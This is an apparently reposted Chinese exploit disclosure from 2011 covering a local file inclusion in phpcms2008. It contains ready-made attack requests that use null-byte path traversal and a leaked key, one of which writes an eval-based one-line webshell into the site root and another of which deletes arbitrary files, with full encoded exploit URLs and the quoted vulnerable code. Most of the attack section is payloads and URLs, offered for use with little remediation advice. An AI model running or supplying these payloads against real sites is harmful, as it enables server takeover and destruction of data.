服务器 > 网络安全 > 脚本攻防

Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

46人参与 2011-05-10 脚本攻防

发布日期:2011-05.04
发布作者:c4rp3nt3r

影响版本:phpcms2008 sp2 or sp4
官方地址:http://www.phpcms.cn

漏洞类型:文件包含
漏洞描述:phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。

由于phpcms的全局变量机制,导致能拿shell的方法很多,类似的问题不止一个。

admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做safe,但是一点也不safe。

公布一个本地包含秒杀拿shell的方法。

包含:admin/safe.inc.php文件get提交一下数据
将在根目录下生成一句话
用上一篇得到的密钥$key='sipeofogblfvcildzewe';
加密如下字符串

$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_post[a])?>&mod=../../admin/safe.inc.php%00';
 

  http://127.0.0.1/n/phpcms/play.php?a_k=gnrbqwjbxkeeusajiajkbtkxhgoddbubbhiwba0ii3alaaabbtuwert0frmgckexchxgnswncvlmehiteivyqta2idq2nyclalzsqjcqe1hdz19lqukoaw8fkhkwcaobdcwzbl05gbvkvl8=


将在根目录下生成一句话木马

同理任意文件删除漏洞:
$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=gnrbqwjbxkeeusajiajkbtkxhgoddbqaazkjdg4jydaqbqkxzzcybxw9a0sbhhtbdwmia21hq0p0ahybhiaeshwhcqjmbsg1brkefh91rw==

参考:flyh4t [phpcms]一个漏洞的二次利用

 

详细说明:

贴上存在漏洞的代码

复制代码
代码如下:

//admin/safe.inc.php
<?php
defined('in_phpcms') or exit('access denied');
// include/common.inc.php 里面声明了常量
// define('in_phpcms', true);
if(empty($action)) $action = "start";
$safe = cache_read('safe.php');
$filecheck = load('filecheck.class.php');
if(empty($safe))
{
$safe = array (
'file_type' => 'php|js',
'code' => '',
'func' => 'com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress',
'dir' => $filecheck->checked_dirs()
);
}
switch ($action)
{
...
case 'edit_code':
if (file_put_contents(phpcms_root.$file_path, stripcslashes($code)))
{
showmessage('修改成功!');
}
break;
case 'del_file':
$file_path = urldecode($files);
if (empty($file_path))
{
showmessage('请选择文件');
}
$file_list = cache_read('scan_backdoor.php');
unset($file_list[$file_path]);
cache_write('scan_backdoor.php',$file_list);
@unlink(phpcms_root.$file_path);
showmessage('文件删除成功!', '?mod=phpcms&file=safe&action=scan_table');
break;
...

漏洞证明:
将在根目录下生成一句话
用上一篇得到的密钥$key='sipeofogblfvcildzewe';
加密如下字符串

$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_post[a])?>&mod=../../admin/safe.inc.php%00';
 

  http://127.0.0.1/n/phpcms/play.php?a_k=gnrbqwjbxkeeusajiajkbtkxhgoddbubbhiwba0ii3alaaabbtuwert0frmgckexchxgnswncvlmehiteivyqta2idq2nyclalzsqjcqe1hdz19lqukoaw8fkhkwcaobdcwzbl05gbvkvl8=


将在根目录下生成一句话木马

同理任意文件删除漏洞:

复制代码
代码如下:

$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=gnrbqwjbxkeeusajiajkbtkxhgoddbqaazkjdg4jydaqbqkxzzcybxw9a0sbhhtbdwmia21hq0p0ahybhiaeshwhcqjmbsg1brkefh91rw==

(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

网站后台脚本漏洞挖掘技巧,基于工具快速挖掘

网站后台脚本漏洞挖掘技巧,基于工具快速挖掘

05-15
ewebeditor 上传遇到防火墙限制的解决办法 图文

ewebeditor 上传遇到防火墙限制的解决办法 图文

05-10

php版shell.users加管理员帐号的方法

06-15

用JavaScript防止网站被挂IFRAME木马的方法

05-01
讯时系统(xuas)最新通杀漏洞0day图文说明

讯时系统(xuas)最新通杀漏洞0day图文说明

07-15

防止网站被JS,iframe挂马的防范方法

05-01

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论